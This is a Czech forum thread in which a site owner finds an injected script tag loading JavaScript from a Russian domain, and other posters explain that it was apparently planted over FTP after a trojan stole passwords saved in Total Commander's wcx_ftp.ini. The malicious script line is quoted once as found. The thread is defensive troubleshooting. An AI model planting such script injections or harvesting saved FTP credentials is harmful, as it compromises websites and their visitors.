vir od rusáků?

Tak čekuju svoje stránky a najednou na mě vybafne spouštěcí okno Javy a chybová hláška .. přemýšlím proč, na stránkách žádnou nemám. Že by Java v reklamě? Asi ... Nádávám tomu velkou váhu... Pak chci upravit článek na stráckách pomocí tinymce a script hlásí chybu že tinymce není definováno ... tak koukám na zdroják stránky a čeho si nevšimnu

<script type="text/javascript" src="http://riotassistance.ru/Emoticon.js"></script>
<!--68527b8886afc1d9eda437b53ce30b53-->

co to k*rva jeeeee to jsem tam nedával ... že by vaše servery napadl nějakej brouk? ani bych se nedivil ...

Nemáte nějaký nový lepší antivir? Na jiným webu na wz jsem měl dlouho uložený rary s žertovnýma prográmkama a antivirák je nedávno označil za viry :-D
Server nic asi nenapdalo, udělej si pořádek u sebe v PC. Je pravděpodobné, že tam máš "drůbež" - projdi antivirem, anti... vším. Hesla v Total Commanderu si ukládej bezpečněji. Prozatím vyměň obsah webu a změň přístupové heslo - jinak se ti to bude opakovat!
hehe tak i na tomhle úště se mi objevil ten kód a to jsem na něj dlouho nelezl ...
jinak počítač mám čistej ! zas takovej amoš nejsem
V tohle je WZ nevinně. Viry takového typu jsou na linuxovém systému imunní. Takže je tam musel dát někdo jiný.

Vir se tam nahrál přes FTP. A to tím, že předem zjistil přístupové údaje. Pak se pomoci těchto údajů připojil na tvé FTP a modifikoval soubor tím, že tam nahrál ten kód.
A kde že zjistil tvé přístupové údaje? Z tvého počítače. Na tvém počítači se nachází nebo nacházel vir, který odchytil nebo jednoduše získal tyto údaje. Případně jiný počítač, který musel nějak získat heslo.

Takže ze všeho nejvíc důkladně zkontroluj počítač na přítomnost viru, neprodleně změň heslo k FTP a toto heslo raději nikam neukládej (kromě hlavy). A uprav si soubory, kde se ten kód objevuje, ať nenakazíš ostatní nebo sebe.
hašiši: Zřejmě jsi od těch svých zavirovaných rarů chytil nějaké breberky. Serverům WZ viry nijak nevadí.

Lukáš: Kde bereš jistotu, že máš počítač čistý? Stačí, když si stáhneš a spustíš nějaký žertovný prográmek. Ani to nemusí být virus. Stačí trojan, který se obecně velmi špatně detekuje. Ten si na tvém disku vyhledá soubor wcx_ftp.ini s uloženými hesly k FTP a pošle někam do Ruska. Během několika sekund se na tvé stránce objeví jiný obsah nahraný právě z Ruska.
zvláštní, že ty rary leží v klidu na disku už skoro 10 let... na wz jsem je měl před těmi 10 lety asi 3 roky pak se web zrušil a asi před dvěma lety jsem ho na jiné adrese na wz obnovil jako neaktivní neaktualizovanou vzpomínku ... ty prográmky jsem nespustil ani nepamatuju ... na win 7 už toho taky z dob win 98 jde minimum..
asi se prográmky v rarech po 10 letech probudily a páchaj škodu .. nj asi se fakt blíží konec světa :-D
S tím koncem světa nepřeháněj. Maximálně konec Windows :-)

Může to být i od jiných breberek, vždyť antiviráky jich zachytí jen asi 19 %.